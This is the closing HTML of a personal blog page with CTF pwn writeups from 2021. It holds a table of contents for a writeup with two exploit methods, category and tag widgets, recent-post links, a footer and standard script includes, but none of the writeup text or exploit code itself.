        <span class="toc-progress-bar"></span>
    </h4>
    <div class="textwidget">
        <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#PWN%EF%BC%9Apwn"><span class="toc-text">PWN：pwn</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#%E9%A2%98%E7%9B%AE%E5%88%86%E6%9E%90"><span class="toc-text">题目分析</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#%E6%96%B9%E6%B3%95%E4%B8%80"><span class="toc-text">方法一</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%80%9D%E8%B7%AF"><span class="toc-text">思路</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%9D%91%E7%82%B9"><span class="toc-text">坑点</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#exp"><span class="toc-text">exp</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#%E6%96%B9%E6%B3%95%E4%BA%8C"><span class="toc-text">方法二</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%80%9D%E8%B7%AF-1"><span class="toc-text">思路</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#exp-1"><span class="toc-text">exp</span></a></li></ol></li></ol>
    </div>
</aside>
                
                
  <aside id="krw-categories" class="widget widget-kratos-categories clearfix">
    <h4 class="widget-title"><i class="fa fa-folder"></i>分类目录</h4>
      <ul class="category-list"><li class="category-list-item"><a class="category-list-link" href="/categories/heap/">heap</a><span class="category-list-count">2</span></li><li class="category-list-item"><a class="category-list-link" href="/categories/stack/">stack</a><span class="category-list-count">1</span></li></ul>
  </aside>


            
                
  <aside id="krw-tags" class="widget widget-kratos-tags clearfix">
    <h4 class="widget-title"><i class="fa fa-tags"></i>标签聚合</h4>
      <div class="tag-clouds">
        <a href="/tags/heap/" style="font-size: 0.7em;">heap</a> <a href="/tags/pwn/" style="font-size: 0.8em;">pwn</a> <a href="/tags/stack/" style="font-size: 0.6em;">stack</a> <a href="/tags/writeup/" style="font-size: 0.8em;">writeup</a> <a href="/tags/%E6%96%B0%E6%89%8B%E5%90%91/" style="font-size: 0.8em;">新手向</a>
      </div>
  </aside>

            
                
  <aside id="krw-posts" class="widget widget-kratos-posts">
  <h4 class="widget-title"><i class="fa fa-file"></i>最新文章</h4>
  <div class="tab-content">
      <ul class="list-group">
        
        
          
          
            <a class="list-group-item" href="/2021/06/06/2021-6-6/"><i class="fa  fa-book"></i> 2021_蓝帽杯半决赛pwn</a>
            
          
        
          
          
            <a class="list-group-item" href="/2021/05/30/2021-5-30/"><i class="fa  fa-book"></i> 2021_BUUCTF&DASCTF_pwn</a>
            
          
        
          
          
            <a class="list-group-item" href="/2021/05/27/2021-5-27/"><i class="fa  fa-book"></i> 2021_360CTF_pwn</a>
            
          
        
      </ul>
  </div>
  </aside>

            
    </div>
</section>
        
        </div>
    </div>
</div>
<footer>
    <div id="footer"  class="ap-lrc"  >
        <div class="kr-tool text-center">
            <div class="tool">
                
                    <div class="box search-box">
                        <a href="/search/">
                            <span class="fa fa-search"></span>
                        </a>
                    </div>
                
                
                    <div class="box theme-box" id="darkmode-switch">
                        <span class="fa fa-adjust"></span>
                    </div>
                
                
            </div>
            <div class="box gotop-box">
                <span class="fa fa-chevron-up"></span>
            </div>
        </div>
        <div class="container">
            <div class="row">
                <div class="col-md-6 col-md-offset-3 footer-list text-center">
                    <ul class="kratos-social-icons">
                        
                        
                        <li><a target="_blank" rel="nofollow" href="https://t.me/CandyUnion"><i class="fa fa-telegram"></i></a></li>
                        
                        
                        
                        <li><a target="_blank" rel="me" href="https://nya.one/@Candinya"><i class="fa fa fa-share-alt-square"></i></a></li>
                        <li><a target="_blank" rel="nofollow" href="https://github.com/Candinya"><i class="fa fa-github"></i></a></li>
                        
                    </ul>
                    <ul class="kratos-copyright">
                        <div>
                            <li>&copy; 2021 Darry's Blog 版权所有.</li>
                            <li>本站已运行<span id="span_dt">Loading...</span></li>
                        </div>
                        <div>
                            <li>Theme <a href="https://github.com/Candinya/Kratos-Rebirth" target="_blank">Kratos:Rebirth</a></li>
                            <li>Site built with&nbsp;<i class="fa fa-heart throb" style="color:#d43f57"></i>&nbsp;by Darry想学二进制.</li>
                        </div>
                        <div>
                            <li>Powered by <a href="https://hexo.io" target="_blank" rel="nofollow">Hexo</a></li>
                            <li>Hosted on <a href="https://github.io" target="_blank">Github Pages</a></li>
                        </div>
                        <div>
                            
                            
                        </div>
                    </ul>
                </div>
            </div>
        </div>
    </div>
</footer>
</div>
</div>

        <script defer src="https://cdn.jsdelivr.net/npm/bootstrap@3.3.4/dist/js/bootstrap.min.js"></script>
<script defer src="https://cdn.jsdelivr.net/npm/nprogress@0.2.0/nprogress.js"></script>
<script>const notMobile = (!(navigator.userAgent.match(/(phone|pad|pod|iPhone|iPod|ios|iPad|Android|Mobile|BlackBerry|IEMobile|MQQBrowser|JUC|Fennec|wOSBrowser|BrowserNG|WebOS|Symbian|Windows Phone)/i)));</script>

    <div>
        <canvas id="snow"></canvas>
        <script async type="text/javascript" src="/js/snow.min.js"></script>
    </div>

<script async src="/js/candy.min.js"></script>

    <script defer src="https://cdn.jsdelivr.net/npm/aplayer@1.10.1/dist/APlayer.min.js"></script>
    
    <script defer src="https://cdn.jsdelivr.net/npm/meting@2/dist/Meting.min.js"></script>
    <meting-js
        server="netease"
        type="playlist"
        id="3204190542"
        order="random"
        fixed="true"
    >
    </meting-js>



    <script defer src="https://cdn.jsdelivr.net/gh/fancyapps/fancybox@3.5.7/dist/jquery.fancybox.min.js"></script>

<script defer src="https://cdn.jsdelivr.net/npm/clipboard@2.0.6/dist/clipboard.min.js"></script>
<script defer src="/js/kratosr.min.js"></script>
<script defer src="/js/pjax.min.js"></script>


    <script defer src="/js/kr-dark.min.js"></script>



<!-- Extra support for third-party plguins  -->


    </body>
</html>